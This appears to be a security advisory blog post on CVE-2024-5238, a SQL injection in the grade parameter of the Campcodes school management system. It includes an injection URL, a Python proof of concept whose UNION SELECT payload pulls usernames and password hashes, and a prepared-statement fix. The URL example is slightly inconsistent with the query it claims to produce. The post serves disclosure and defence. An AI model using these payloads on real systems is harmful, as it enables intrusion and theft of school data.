A critical vulnerability, CVE-2024-5238, affects Campcodes Complete Web-Based School Management System 1.. This flaw allows remote attackers to perform SQL injection by exploiting the grade parameter in /view/timetable_insert_form.php. Since this bug is public, it's essential for webmasters and school IT staff to patch it as soon as possible.

What’s the Problem?

Campcodes Complete Web-Based School Management System helps educational institutions manage students, staff, and timetables. Unfortunately, a missing input validation in the grade argument of a PHP script opens the door for attackers to execute malicious SQL queries against the backend database.

Vulnerability Identifier:
- CVE: CVE-2024-5238
- VDB: VDB-265989

How Does the Exploit Work?

The vulnerable script likely takes the grade parameter and uses it directly in a SQL statement, without any sanitization.

Example Vulnerable Code

// timetable_insert_form.php (hypothetical vulnerable code)
$grade = $_GET['grade'];
$sql = "SELECT * FROM timetable WHERE grade = '$grade'";
$result = mysqli_query($conn, $sql);

// No input validation or sanitization!

If an attacker submits the following URL

https://[target-site]/view/timetable_insert_form.php?grade=1'; OR '1'='1

The resulting query becomes

SELECT * FROM timetable WHERE grade = '1' OR '1'='1'

This condition '1'='1' is always true, allowing the attacker to retrieve all records from the timetable or, with more complex payloads, manipulate or destroy data.

import requests

target_url = 'https://TARGET_SITE/view/timetable_insert_form.php';
payload = "1' UNION SELECT 1, username, password, 4 FROM users-- -"

params = {'grade': payload}
response = requests.get(target_url, params=params)

print(response.text)  # This may dump usernames/password hashes if exploited

Note: Only use this against systems you have permission to test!

How to Fix

Developers:

Secure Code Example

// Secure: Using Prepared Statements

$grade = $_GET['grade'];
$stmt = $conn->prepare("SELECT * FROM timetable WHERE grade = ?");
$stmt->bind_param("s", $grade);
$stmt->execute();
$result = $stmt->get_result();

References

- CVE-2024-5238 in NVD
- VDB-265989 in VulDB
- Campcodes Official Page (for updates/patches)

Final Thoughts

CVE-2024-5238 is a high-severity flaw that makes schools’ sensitive data vulnerable to attackers. Patch urgently, audit your code, and never trust user input. Stay safe and keep your school’s data protected!

Timeline

Published on: 05/23/2024 06:15:12 UTC
Last modified on: 06/04/2024 19:21:03 UTC